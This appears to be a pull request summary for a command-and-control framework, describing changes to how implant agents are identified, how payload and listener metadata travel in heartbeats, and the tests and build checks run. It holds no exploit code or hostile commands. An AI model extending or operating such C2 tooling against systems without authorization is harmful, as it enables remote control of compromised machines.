- add listener/payload metadata to generated agent config while leaving runtime agent_id empty by default
- add runtime agent ID resolution in the Rust agent with optional explicit override and persisted generated fallback
- include payload/listener metadata in heartbeat while routing by runtime agent ID
- validate listener heartbeat path/body ID consistency and reject malformed operator agent paths
- add regression tests for distinct payload builds, multi-agent isolation on one listener, heartbeat ID mismatch, and agent runtime ID behavior

## Verification
- go test ./...
- go vet ./...
- go build -o /private/tmp/microc2-server-issue64 ./cmd
- bash -n install.sh
- bash -n agent/build.sh
- node --check server/web/js/*.js
- cargo fmt --check
- cargo test --locked
- cargo clippy --locked --all-targets (passes with existing warnings)
- cargo build --locked (passes with existing warnings)
- Foxguard: npx foxguard@latest diff --format json origin/dev . -> 0 new issues